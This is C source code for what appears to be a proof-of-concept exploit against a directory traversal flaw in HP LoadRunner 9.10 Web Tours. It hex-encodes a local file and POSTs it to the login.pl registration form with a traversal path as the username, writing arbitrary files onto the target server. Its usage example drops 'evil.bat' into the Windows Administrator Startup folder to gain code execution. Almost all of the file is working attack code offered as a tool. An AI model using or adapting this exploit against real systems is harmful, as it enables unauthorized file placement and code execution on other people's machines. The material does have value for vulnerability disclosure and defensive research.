/*
    by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/stat.h>
#include "mydownlib.h"

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER     "0.1a"
#define PORT    1080
#define MYPOST  "username=%s&password=%s&passwordConfirm=%s&firstName=&lastName=&address1=&address2=&register.x=1&register.y=1"



u8 *bin2hex(u8 *data, int *size);
u8 *fd_load(u8 *fname, int *fsize);
void std_err(void);



int main(int argc, char *argv[]) {
    mydown_options  opt;
    int     fsize,
            postsz;
    u16     port    = PORT;
    u8      *url,
            *host,
            *flocal,
            *fremote,
            *filedata,
            *fdata,
            *post;

    setbuf(stdout, NULL);

    fputs("\n"
        "HP LoadRunner <= 9.10 Web Tours upload directory traversal "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stderr);

    if(argc < 4) {
        printf("\n"
            "Usage: %s <local_file> <remote_file> <host> [port(%hu)]\n"
            "\n"
            "Examples:\n"
            "  willycoyote evil.bat \"../../../../../../Documents and Settings/Administrator/Start Menu/Programs/Startup/evil.bat\" 127.0.0.1\n"
            "\n"
            "Note: don't use binary files since the line-feed char (0x0a) is converted to\n"
            "      0x0d 0x0a by the remote perl script if running on Windows\n"
            "Note: remote files which already exist canNOT be overwritten\n"
            "\n", argv[0], port);
        exit(1);
    }

    flocal  = argv[1];
    fremote = argv[2];
    host    = argv[3];
    if(argc > 4) port = atoi(argv[4]);

    fdata = fd_load(flocal, &fsize);
    fdata = bin2hex(fdata,  &fsize);

    post = malloc(sizeof(MYPOST) + strlen(fremote) + fsize + fsize + 128);
    if(!post) std_err();

    postsz = sprintf(
        post,
        MYPOST,
        fremote,
        fdata,
        fdata);

    free(fdata);

    memset(&opt, 0, sizeof(opt));
    opt.verbose     = 1;
    opt.filedata    = &filedata;
    opt.content     = post;
    opt.contentsize = postsz;
    opt.get         = "POST";

    url = malloc(128 + strlen(host));
    if(!url) std_err();
    sprintf(url, "http://%s:%hu/WebTours/login.pl", host, port);

    if(mydown(url, NULL, &opt) == MYDOWN_ERROR) {
        printf("- try relaunching this tool again, it should work\n");
    } else {
        printf("- done\n");
    }

    free(post);
    free(url);
    return(0);
}



u8 *bin2hex(u8 *data, int *size) {
    static const char   hex[16] = "0123456789abcdef";
    u8      *ret,
            *r,
            *d,
            *l;

    l = data + *size;
    *size = (*size * 3) + 1;
    ret = malloc(*size);
    if(!ret) std_err();
    r = ret;

    for(d = data; d < l; d++) {
        *r++ = '%';
        *r++ = hex[*d >> 4];
        *r++ = hex[*d & 15];
    }
    *r = 0;

    free(data);
    return(ret);
}



u8 *fd_load(u8 *fname, int *fsize) {
    struct  stat xstat;
    FILE    *fd;
    u8      *buff;

    fprintf(stderr, "- open file %s\n", fname);
    fd = fopen(fname, "rb");
    if(!fd) std_err();
    fstat(fileno(fd), &xstat);
    buff = malloc(xstat.st_size);
    if(!buff) std_err();
    fread(buff, 1, xstat.st_size, fd);
    fclose(fd);
    *fsize = xstat.st_size;
    return(buff);
}



void std_err(void) {
    perror("\nError");
    exit(1);
}


